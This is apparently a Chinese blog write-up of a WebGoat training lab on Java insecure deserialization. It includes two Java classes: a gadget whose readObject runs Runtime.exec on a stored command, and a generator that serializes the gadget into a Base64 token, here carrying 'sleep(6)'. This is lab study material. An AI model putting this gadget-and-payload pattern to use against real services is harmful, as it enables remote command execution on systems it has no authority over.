level-5

  找到java文件,可以看到传入的token经过64解码后输入导对象输入流中,然后没有加限制直接readObject进行了反序列化操作,确实存在漏洞点~

package org.owasp.webgoat.plugin;

import java.io.*;
import java.util.Base64;

public class ExploitDeserialize {
    public static void main(String[] args) throws IOException{
        GadgetObject goGadgetObject = new GadgetObject();
        goGadgetObject.setCmd("sleep(6)");

        ByteArrayOutputStream boStream = new ByteArrayOutputStream();
        ObjectOutputStream ooStream = new ObjectOutputStream(boStream);
        ooStream.writeObject(goGadgetObject);
        ooStream.flush();
        byte[] exp = boStream.toByteArray();
        String b64token = Base64.getEncoder().encodeToString(exp);
        System.out.println(b64token);
    }
}
package org.owasp.webgoat.plugin;

import java.io.ObjectInputStream;
import java.io.Serializable;

public class GadgetObject implements Serializable {
    private String cmd;

    public void setCmd(String cmd) {
        this.cmd = cmd;
    }

    private void readObject( ObjectInputStream stream ) throws Exception {
        stream.defaultReadObject();
        try{
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(cmd);
        }catch (Exception e) {
            e.printStackTrace();
        }
    }
}

  这里构造两个java文件,用来生成可以用的payload(因为反序列化这个东西,不同语言差别还是挺大的,就只能用残缺的java知识搞一个这个了……还是太菜了,java急需深造啊)

  生成payload,让服务器等待5秒~

  很奇怪的是没用行得通,很奇怪是那里搞错了,有可能是我写的java类有问题???我回头再去看一下……

  这里开一个DNSLog来验证一下吧,不信这个邪~

  果然,这里是可以访问到的,大概写的java也没有问题,但那是哪里出问题了嘞???真搞不懂,再研究研究,java水太深了……

 

内容来源于网络如有侵权请私信删除

文章来源: 博客园

原文链接: https://www.cnblogs.com/wavesky/p/16718529.html

你还没有登录,请先登录注册
  • 还没有人评论,欢迎说说您的想法!